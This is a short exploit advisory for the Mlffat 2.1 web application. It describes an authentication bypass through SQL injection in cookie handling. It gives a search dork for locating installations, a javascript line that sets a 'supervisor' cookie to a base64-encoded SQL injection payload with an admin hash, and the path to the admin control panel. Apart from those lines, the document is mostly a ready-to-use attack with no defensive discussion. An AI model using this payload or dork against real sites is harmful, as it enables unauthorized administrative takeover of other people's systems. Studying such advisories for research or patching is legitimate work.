id: 5164
date: 05/12/2009
title: Mlffat 2.1 (Auth Bypass / Cookie) SQL Injection Vulnerability
author: Qabandi
cves: 

=============================================================
Mlffat 2.1 (Auth Bypass / Cookie) SQL Injection Vulnerability
=============================================================


######################################################
#	MLFFAT 2.1 - insecure Cookie Handling     
# 			 	     
######################################################
Buy:  http://mlffat.com/emm/index.php?action=order
Dork: "Powered by mlffat"
------------------------------------------------------
-:PoC:-

javascript:document.cookie = "supervisor=OmFkbWluJyBvciAnMSc9JzE6MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM="

AdminCP: ./cpanel/index.php




#  0day.today [2023-03-24]  #